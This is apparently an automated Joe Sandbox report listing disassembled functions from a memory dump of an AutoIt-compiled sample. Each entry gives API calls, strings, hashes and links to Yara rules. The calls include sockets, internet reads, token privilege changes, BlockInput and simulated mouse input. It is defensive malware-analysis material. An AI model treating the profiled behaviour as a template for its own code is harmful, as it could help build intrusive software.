Instruction ID: fc48cc6591cb8e0ca527578a24a02c6cc2d5d6206f3d83c04856c74cefd2bdc6
Opcode Fuzzy Hash: 366143c1a614be05a9071285cb419979af059112ea97f5e0d0a6fd721190cf40
Instruction Fuzzy Hash: A24184B591120EAFCF15EF64C849AEEBBB8EF05350F144065E909E2191EB709E64CF61

Function 00302263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00303AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00303AD7
Part of subcall function 00303AAB: _wcslen.LIBCMT ref: 00303AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003022BA
WSAGetLastError.WSOCK32 ref: 003022E1
bind.WSOCK32(00000000,?,00000010), ref: 00302338
WSAGetLastError.WSOCK32 ref: 00302343
closesocket.WSOCK32(00000000), ref: 00302372

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: d2a1c0d2f54bc6db1228c7e66901d1008e24855427e15ec2ca6fddf93005eb48
Instruction ID: 929936720a1f4a5619260a3f13bcd00759d11316cf1e377ee3b34293dccda1dd
Opcode Fuzzy Hash: d2a1c0d2f54bc6db1228c7e66901d1008e24855427e15ec2ca6fddf93005eb48
Instruction Fuzzy Hash: BD51E475A00210AFEB11AF24C89AF6A77E9AB49718F54C088F9495F3C3D770AC51CBE1

Function 003126DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0031275C
IsWindowEnabled.USER32 ref: 0031276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00312777
IsIconic.USER32 ref: 00312785
IsZoomed.USER32 ref: 00312793

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 6afcdb4dabd363b077855f29338a0f09ff2d60ea6ca333c530e8914368fbb852
Instruction ID: 27d46f4920a8335957a44b2a6f6a4a7d7b4978b2e35f1306eec53be6b1ca3d77
Opcode Fuzzy Hash: 6afcdb4dabd363b077855f29338a0f09ff2d60ea6ca333c530e8914368fbb852
Instruction Fuzzy Hash: 8021F7357002109FD71A9F26C844B9B7BE9EF9D314F5A806CE8498B292DB71DC92CB90

Function 002FD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 002FD8CE
GetLastError.KERNEL32(?,00000000), ref: 002FD92F
SetEvent.KERNEL32(?,?,00000000), ref: 002FD943

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 740463df57f0324eccd4cf91f4a80180a083854181509285aac6c42be6c77548
Instruction ID: 05fada10aa2da59843f9293e02f3bc74cea3273fd4bffa17647aff29ce8c3448
Opcode Fuzzy Hash: 740463df57f0324eccd4cf91f4a80180a083854181509285aac6c42be6c77548
Instruction Fuzzy Hash: 1F21C17151070AAFE7209FA5C944BABB7FDEB41354F10842DE64692141D7B0EA15CB50

Function 002EE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,002C46AC), ref: 002EE482
GetFileAttributesW.KERNEL32(?), ref: 002EE491
FindFirstFileW.KERNEL32(?,?), ref: 002EE4A2
FindClose.KERNEL32(00000000), ref: 002EE4AE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: e5e1d65377c432ddc6f698133d4c6de4b33f3c996ad46f359134c1dc387fd2c4
Instruction ID: 28f848cb3b9e822852f255edda1e9f5e8044a9574e3cd910fc7ffc30a26de4d1
Opcode Fuzzy Hash: e5e1d65377c432ddc6f698133d4c6de4b33f3c996ad46f359134c1dc387fd2c4
Instruction Fuzzy Hash: 86F0E53042092067D6117B3CBC0D8EB77ADAE07335F908B01F836C20F0D7B89DA68695

Function 002DE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002DE5F8

Strings

%.3d, xrefs: 002DE603
X64, xrefs: 002DE680

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: cce71329db50435d80e44f143e8b99d683547ac6e9c0690c7fc1495f9fb09326
Instruction ID: aea70a5380714327c1a67838d3fddaaa778c31a8053dc56774027fcbb148ac09
Opcode Fuzzy Hash: cce71329db50435d80e44f143e8b99d683547ac6e9c0690c7fc1495f9fb09326
Instruction Fuzzy Hash: 8BD0ECB5C38118D6CEC1AA909D88DB9727CAB18700F118857F91695141E6A4DD649A61

Function 002B2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 002B2A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 002B2A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 002B2AA1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b255608c0e847950807ffbbfeab917900bb334749750086c3d166b6af14ca226
Instruction ID: fcbac6b44610214a019694a9d31f31e706ab3e3cc51abecf4264b2edd32d822a
Opcode Fuzzy Hash: b255608c0e847950807ffbbfeab917900bb334749750086c3d166b6af14ca226
Instruction Fuzzy Hash: 8831D67591132C9BCB21DF68D9887DCBBB8AF08310F5081DAE81CA7260EB349F958F45

Function 002E2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 002A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002A09D8
Part of subcall function 002A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002A09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E2087
GetLastError.KERNEL32 ref: 002E2097

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: cd2f952a58241e509d1ae3300f11a338b303326d02f75adcb941c5f6e38ecc1b
Instruction ID: 6e60a06ed00be0a6fa9196f3ff667a07844fcefa2f1d0ada66696e8dbfb9fb37
Opcode Fuzzy Hash: cd2f952a58241e509d1ae3300f11a338b303326d02f75adcb941c5f6e38ecc1b
Instruction Fuzzy Hash: 6B119DB1420205AFD718AF54DCC6EAAB7ACEB09710B20841EE05652291DB70AC55CA20

Function 002A5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,002A502E,?,003498D8,0000000C,002A5185,?,00000002,00000000), ref: 002A5079
TerminateProcess.KERNEL32(00000000,?,002A502E,?,003498D8,0000000C,002A5185,?,00000002,00000000), ref: 002A5080
ExitProcess.KERNEL32 ref: 002A5092

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 39381cca4de2cb8b8e6085aeac96dd224057613b97fdc3d7f07d330ea61e2137
Instruction ID: a67a470a5f369cc50eaeed78bbef368833f9f2623359618c043a00799afe3127
Opcode Fuzzy Hash: 39381cca4de2cb8b8e6085aeac96dd224057613b97fdc3d7f07d330ea61e2137
Instruction Fuzzy Hash: ACE0B632010A58AFCF226F54DD09E993B6DEB5A381F118414F8599A121DB3ADD62CAC0

Function 002DE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 002DE664

Strings

X64, xrefs: 002DE680

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 605c61bededd803fc5173e4d39a20afaa1e088956e16715357c296f479c66bb6
Instruction ID: 9f5467fc02dd9812b81a146c2ac6d3664ce879ae649db55f1dee1585d741338c
Opcode Fuzzy Hash: 605c61bededd803fc5173e4d39a20afaa1e088956e16715357c296f479c66bb6
Instruction Fuzzy Hash: 73D0C9B482111DEACF80CB50ECC8EDD737CBB08304F114652F146A2140D770A5488F10

Function 002F41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003052EE,?,?,00000035,?), ref: 002F4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003052EE,?,?,00000035,?), ref: 002F4239

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1b450515dcc96615fb015322c6baf017742d21f324d2d6b8224644442986f84f
Instruction ID: 7a57d6feffbfcb3618ee0a7153de3c1d7dce61aa9afba14b869a1b1c85d634d5
Opcode Fuzzy Hash: 1b450515dcc96615fb015322c6baf017742d21f324d2d6b8224644442986f84f
Instruction Fuzzy Hash: 05F0E5346102296AE72126659C4DFFBB66DEFC9761F000279FA09D2181DAB09900C7B1

Function 002E1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002E1B48), ref: 002E1A20
CloseHandle.KERNEL32(?,?,002E1B48), ref: 002E1A35

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: e61a1d3a82c712483319c8a2db9a75e466ffe0e7f2da8d1f29f54728362437f6
Instruction ID: 90c67d3f6cf86951809fd7b31d4207765321d11a35a52d8b6a1567f4a26418ba
Opcode Fuzzy Hash: e61a1d3a82c712483319c8a2db9a75e466ffe0e7f2da8d1f29f54728362437f6
Instruction Fuzzy Hash: 3FE01A72014610AFE7262B20EC05EB6B7A9EB09310F14882DB4A580470DA62ACA0DA10

Function 002FF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 002FF51A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 215086545b546c2aaf944056c80963522debc90ef86bd319c585cf9d8a71dfe5
Instruction ID: 3d70a694f2862873c510476d8e9a066c4c5df73057a240bfa4f136f02dfa289a
Opcode Fuzzy Hash: 215086545b546c2aaf944056c80963522debc90ef86bd319c585cf9d8a71dfe5
Instruction Fuzzy Hash: 12E0D8352202045FD710EF69D400996F7DCEFA43A0F008426F949C7351D670F8508BA0

Function 002EEC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002EEC95

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 3812ea991ad0bf72f1be521e835fbe9df4c49473b519151aaafe0041d53ea50b
Instruction ID: 751066da7c0610ceba3b25c63b66235f06c0ae1e96dd01aa1efc7744c3e7f7bc
Opcode Fuzzy Hash: 3812ea991ad0bf72f1be521e835fbe9df4c49473b519151aaafe0041d53ea50b
Instruction Fuzzy Hash: B5D012751F038169EC190E3D8B1FE760509A302745FE2634AB111D5595E5E1B9515119

Function 002A0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,002A075E), ref: 002A0D4A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8032e87e79a5bc7146f1af61b45f66004844eba288561c143bc36927926dc178
Instruction ID: 16189962945bfdb6740b668a811c80de3b7255a22342b4910d253141b72a6b9f
Opcode Fuzzy Hash: 8032e87e79a5bc7146f1af61b45f66004844eba288561c143bc36927926dc178
Instruction Fuzzy Hash:

Function 0030353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0030358D
DeleteObject.GDI32(00000000), ref: 003035A0
DestroyWindow.USER32 ref: 003035AF
GetDesktopWindow.USER32 ref: 003035CA
GetWindowRect.USER32(00000000), ref: 003035D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00303700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0030370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00303755
GetClientRect.USER32(00000000,?), ref: 00303761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0030379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003037BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003037D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003037DD
GlobalLock.KERNEL32(00000000), ref: 003037E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003037F5
GlobalUnlock.KERNEL32(00000000), ref: 003037FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00303805
GlobalFree.KERNEL32(00000000), ref: 00303810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00303822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00320C04,00000000), ref: 00303838
GlobalFree.KERNEL32(00000000), ref: 00303848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0030386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0030388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003038AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00303A9C

Strings

AutoIt v3, xrefs: 0030374F
, xrefs: 00303A22
static, xrefs: 00303797, 003038EE
DISPLAY, xrefs: 003038FF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 129df9ab880a1b4a249cd24afee515ff97a035345c9f8f379d126873d136897c
Instruction ID: f99a6561feffa9a1e48b3c06310f32819512afdc9541d43b13d88058b058b403
Opcode Fuzzy Hash: 129df9ab880a1b4a249cd24afee515ff97a035345c9f8f379d126873d136897c
Instruction Fuzzy Hash: E502AD75901219AFDB16DF64CC89EAE7BBDEB49310F108558F915AB2A0CB74EE01CF60

Function 00281625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 002816B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 002C2B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002C2B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002C2F85

Part of subcall function 00281802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00281488,?,00000000,?,?,?,?,0028145A,00000000,?), ref: 00281865

SendMessageW.USER32(?,00001053), ref: 002C2FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002C2FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 002C2FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 002C2FF9

Strings

0, xrefs: 002C2E11
(5, xrefs: 002C2CA1
(5, xrefs: 002C3035
(5, xrefs: 002C2B86

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$(5$(5$(5
API String ID: 2760611726-61173067
Opcode ID: 285c2ad56b82680e1ea2c521d70361f75c20e717e6de963810b8dfdf8a3aba56
Instruction ID: 4cef902635667f7fee718fabf95b2e900483940d140a9fc636e62943cfa5b899
Opcode Fuzzy Hash: 285c2ad56b82680e1ea2c521d70361f75c20e717e6de963810b8dfdf8a3aba56
Instruction Fuzzy Hash: D312A174221212DFC726DF14C844FAAB7E9FF45301F18866DE4859B6A1CB31E8B6CB91

Function 0030316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0030319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003032C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00303306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00303316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0030335D
GetClientRect.USER32(00000000,?), ref: 00303369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 003033B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003033C1
GetStockObject.GDI32(00000011), ref: 003033D1
SelectObject.GDI32(00000000,00000000), ref: 003033D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003033E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003033EE
DeleteDC.GDI32(00000000), ref: 003033F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00303423
SendMessageW.USER32(00000030,00000000,00000001), ref: 0030343A
